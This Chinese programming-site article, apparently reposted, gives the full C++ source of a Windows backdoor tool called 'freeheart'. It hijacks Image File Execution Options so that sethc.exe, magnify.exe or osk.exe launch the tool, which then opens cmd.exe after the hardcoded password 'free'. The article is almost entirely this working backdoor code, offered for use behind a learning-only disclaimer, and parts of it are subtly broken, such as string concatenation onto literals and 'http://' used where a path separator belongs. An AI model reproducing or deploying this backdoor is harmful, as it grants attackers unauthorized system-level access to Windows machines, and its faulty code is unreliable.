C++映像劫持后門實例分析

2020-01-26 15:07:08

字體：大中小

來源：轉載

供稿：網友

本文實例講述了C++映像劫持后門的方法。分享給大家供大家參考。具體如下：

// freeheart.cpp : Defines the entry point for the console application.//學習交流使用，違法使用后果自負。// by:cnblogs.com/blogg time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i // argv 2 = name.exe// argv 3 = 1 2 3// 此程序使用的映像劫持技術，// 在注冊表當中建立一個程序名的項目,在里面使用debugger,然后在里面指向自己的程序。//[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options]//#include "stdafx.h"#include "windows.h"#include "atlbase.h"#include <iostream>using namespace std;int main(int argc, char* argv[]){void anzhuang(char *Path,char *filename);void xiezai(char *path,char *hName);void CopyZiji(char *CopyPath);char *password = "free";   //真密碼緩沖區char *shuruPwd = "";    //輸入的密碼緩沖區int errorbuff = 0;char *PathBuff = "";  char *FileName = "";char *chsname = "sethc.exe"; //SHIFT粘貼鍵程序的名稱char *fangdajing = "magnify.exe"; //char *pingmujianpan = "osk.exe"; //LPTSTR sysbuff;   //得到系統路徑的緩沖區TCHAR tchBuffer2[1024];  //申請一個字符變量數組sysbuff = tchBuffer2; //把系統的路徑放到這個變量數組里 if(GetSystemDirectory(sysbuff, MAX_PATH)) //得到系統路徑 {  sysbuff = strcat(sysbuff,"http://"); //strcat 剪切在一起,把//放在系統路徑的后面，然后放入系統緩沖區當中。  } if (argv[1] != NULL) {  //安裝命令判斷  if (strcmp(argv[1],"-i") == 0)  {   if (argv[2] != NULL)   {    FileName=argv[2];   }   else   {    cout<<"請輸入文件名!";    return 0;   }   if(argv[3] != NULL)   {    if(strcmp(argv[3],"1") == 0)    {     anzhuang(FileName,chsname);     PathBuff = strcat(sysbuff,FileName);     CopyZiji(PathBuff);      cout<<"創建完成! : "<<PathBuff<<endl;     return 0;    }     if(strcmp(argv[3],"2") == 0)     {     anzhuang(FileName,fangdajing);     PathBuff = strcat(sysbuff,FileName);     CopyZiji(PathBuff); //調用函數     cout<<"創建完成! : "<<PathBuff<<endl;     return 0;     }      if(strcmp(argv[3],"3") == 0)      {      anzhuang(FileName,pingmujianpan);      PathBuff = strcat(sysbuff,FileName);      CopyZiji(PathBuff); //調用函數      cout<<"創建完成! : "<<PathBuff<<endl;      return 0;      }   }       else       {       cout<<"請輸入參數!"<<endl;       }   return 0;  }//卸載  if (strcmp(argv[1],"-u") == 0)  {   if(argv[2] != NULL)   {    if(strcmp(argv[2],"1") == 0)    {     xiezai(sysbuff,chsname);     cout<<"刪除文件成功!"<<endl;     return 0;    }     if(strcmp(argv[2],"2") == 0)     {     xiezai(sysbuff,fangdajing);     cout<<"刪除文件成功!"<<endl;     return 0;     }      if(strcmp(argv[2],"3") == 0)      {      xiezai(sysbuff,pingmujianpan);      cout<<"刪除文件成功!"<<endl;      return 0;      }   }       else       {       cout<<"請輸入參數!"<<endl;       }   return 0;  }      //為什么會進入這里 因為debugger a.exe 其實是兩個參數，因為if (argv[1] != NULL) 也就是第二個參數不等于空的話執行下面的語句。      while(errorbuff<3) //循環三次，錯誤。       {       cout<<"password:";       cin>>shuruPwd;        if (strcmp(shuruPwd,password) == 0)        {        system("cmd.exe");        break;        }         else         {         cout<<"密碼錯誤!"<<endl;         }         errorbuff++; //自加一次        }       return 0; }system("color a");cout<<"-----------------------------------------------------"<<endl;cout<<"歡迎光臨自由的心,祝您好運!"<<endl;cout<<"1: sethc.exe  Shift后門/n";cout<<"2: magnify.exe 放大鏡后門/n";cout<<"3: osk.exe  屏幕鍵盤后門/n";cout<<"-----------------------------------------------------"<<endl;cout<<"安裝: freeheart.exe -i xx.exe 1"<<endl;cout<<"卸載: freeheart.exe -u 1"<<endl;cout<<"連接密碼:free"<<endl;cout<<"-----------------------------------------------------"<<endl;return 0;}//安裝函數void anzhuang(char *Path,char *filename){ HKEY hSoftKey = NULL; HKEY hCompanyKey = NULL; if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options"), 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS) {  if (RegCreateKeyEx(hSoftKey, _T(filename), 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_WRITE|KEY_READ, NULL,&hCompanyKey,NULL) == ERROR_SUCCESS)  {   LPBYTE Value=(LPBYTE)Path;    long ret1=::RegSetValueEx(hCompanyKey,"Debugger",0,REG_SZ,(BYTE*)Value,50);    RegCloseKey(hCompanyKey);  }  RegCloseKey(hSoftKey); }}//卸載函數void xiezai(char *path,char *hName) //hName 傳遞進來的程序名{ HKEY hSoftKey = NULL; LPCTSTR hMainKey="SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options";  if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, hMainKey, 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS) { DWORD len = 256; DWORD type = REG_SZ; LPBYTE last = new BYTE[256]; LPCTSTR hname = (LPCTSTR)hName;  char *HHname; HKEY hKey;    //在注冊表當中創建一個magnify名的項，在里面當中加入debugger,里面跟上自己的程序名的值。 char* DelCom; HHname=strcat((char *)hMainKey,"http://"); //hmainkey 注冊表的路徑 HHname=strcat((char *)hMainKey,(char *)hname); //hname 程序名  if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)HHname,0,KEY_READ,&hKey)==ERROR_SUCCESS && RegQueryValueEx(hKey,"Debugger",0,&type,last,&len)==ERROR_SUCCESS)  {   DelCom=strcat(path,reinterpret_cast <char*>(last));   DeleteFile(DelCom); //刪除文件   RegDeleteKey(hSoftKey,hname); //刪除注冊表  }  RegCloseKey(hSoftKey); //關閉句柄  RegCloseKey(hKey); //關閉句柄 }}void CopyZiji(char *CopyPath) //將自身生成exe文件復制到指定的路徑下{ char PathBuff[MAX_PATH]; //申請一個字符變量數組,大小是系統最大的長度。 GetModuleFileName(NULL,PathBuff,MAX_PATH); //第一個參數為NULL，就表示獲取當前程序的路徑,第二個參數就是存放到緩沖區。 CopyFile(PathBuff,CopyPath,true); //CurrentPath 是自身exe,把自身復制到目標路徑當中}

希望本文所述對大家的C++程序設計有所幫助。

上一篇：C++實現優酷土豆去視頻廣告的方法

下一篇：VC++植物大戰僵尸中文版修改器實現代碼